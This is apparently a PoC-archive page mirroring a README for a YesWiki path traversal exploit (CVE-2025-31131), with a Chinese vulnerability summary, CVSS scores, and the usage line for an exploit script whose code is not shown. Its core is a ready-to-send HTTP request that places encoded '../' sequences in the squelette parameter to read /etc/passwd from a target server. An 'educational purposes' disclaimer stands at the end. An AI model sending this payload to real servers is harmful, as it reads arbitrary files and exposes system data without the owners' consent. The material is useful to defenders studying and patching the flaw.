关联漏洞
标题:
YesWiki 路径遍历漏洞
(CVE-2025-31131)
描述:YesWiki是法国YesWiki组织的一个用 PHP 编写的 wiki 系统。用于以协作方式创建和管理网站。 YesWiki 4.5.2之前版本存在路径遍历漏洞,该漏洞源于squelette参数容易受到路径遍历攻击,可能导致读取服务器上的任意文件。
描述
CVE-2025-31131
介绍
# Blackash-CVE-2025-31131
CVE-2025-31131 - YesWiki < 4.5.2 Path Traversal Exploit
## Description
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. This vulnerability is fixed in 4.5.2.
NIST: `NVD` Base Score: 7.5 🔴 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CNA: `GitHub, Inc` Base Score: 8.6 🔴 HIGH Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Usage
```
┌──(kali㉿kali)-[~]
└─$ sudo python3 exploit.py -u https://example.com/
```
Here is a second method to exploit manually using Burp:
```
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```
## Disclaimer !!!
This is strictly for educational purposes only.
文件快照
[4.0K] /data/pocs/66004f551782185f11b58b4ab5c74a2e95bdf14e
├── [4.0K] CVE-2025-31131.py
└── [1.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。